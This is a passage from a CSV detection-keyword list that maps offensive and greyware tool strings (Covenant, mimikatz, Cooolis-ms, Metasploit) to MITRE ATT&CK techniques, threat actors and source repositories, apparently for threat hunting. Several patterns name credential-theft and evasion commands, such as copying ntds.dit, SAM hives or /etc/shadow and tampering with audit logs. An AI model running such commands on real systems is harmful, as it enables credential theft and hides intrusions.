TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-Shellcode*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-String.*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisVirtualAlloc*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*copy *\legit.sys *Windows\System32\Drivers\*.sys*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*copy *\NTDS\ntds.dit *\Temp\*.*,greyware_tool_keyword,copy,the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.,T1003.001 - T1567.001 - T1070.004,TA0005 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*copy *NTDS\NTDS.dit*Temp*,greyware_tool_keyword,copy,copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all domain users,T1003.003,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive 
!,N/A,N/A,N/A,N/A,N/A,N/A -*copy *sam.hive \\*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*copy *system.hive \\*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Copy New *gdrive://www.googleapis.com/GS_Sync/*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*Copy New *sftp://*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*CopyAndPasteEnum.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*CopyAndPasteFileDownloader.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*Copy-Item -Path * -Destination \\$IP\transfer*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to 
extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Copyright (c) 2023 whoamianony.top*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*core/handler/reverse*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*core/sprayers/lync.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*core/teamserver/stagers/*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*CoreSecurity/impacket/*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Corrupted MAC on input*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*corscanner -i urls.txt -t 100*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Could not set file modification time.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of 
False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Could not write NTLM Hashes to the specified JTR_Dump_Path *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Couldn't clone GPO {} (maybe it does not exist?*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*couldn't handle sandbox event*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Covenant.API*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red 
teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.Models*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant/Covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant/wwwroot*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantAPI.*,offensive_tool_keyword,covenant,Covenant is a collaborative 
.NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantAPIExtensions.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantBaseMenuItem.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantService.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUser.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z 
-*CovenantUserLogin.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUserLoginResult.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUserRegister.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*covid19_koadic.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*cow-branded-longhorn.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cowpatty -f *.txt -r *.cap -s *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Cowpatty*,offensive_tool_keyword,Cowpatty,coWPAtty - Brute-force dictionary attack against WPA-PSK.,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/joswr1ght/cowpatty,1,1,N/A,N/A,2,152,34,2018-12-04T22:26:47Z,2017-08-14T20:33:22Z -*cowsay -f dragon 'PEzor!!*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*cp /etc/passwd*,greyware_tool_keyword,cp,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cp /etc/shadow /tmp/.*,offensive_tool_keyword,EQGR,Equation Group scripts and tools,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cp /etc/shadow*,greyware_tool_keyword,cp,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cp /var/log/audit/audit.log .tmp*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked note defense evasion,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*cp -i /bin/sh */crond*,greyware_tool_keyword,crond,Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. 
is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.,T1036 - T1564.003 - T1059.004,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*cp sliver-* /opt/tools/bin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cpp_test_payload.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*Cr3dOv3r*,offensive_tool_keyword,Cr3dOv3r,Know the dangers of credential reuse attacks.,T1110 - T1555 - T1003,TA0006 - TA0040 - TA0003,N/A,N/A,Credential Access,https://github.com/D4Vinci/Cr3dOv3r,1,1,N/A,N/A,10,1902,437,2019-03-28T14:53:38Z,2017-11-13T20:49:57Z -*cracf2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 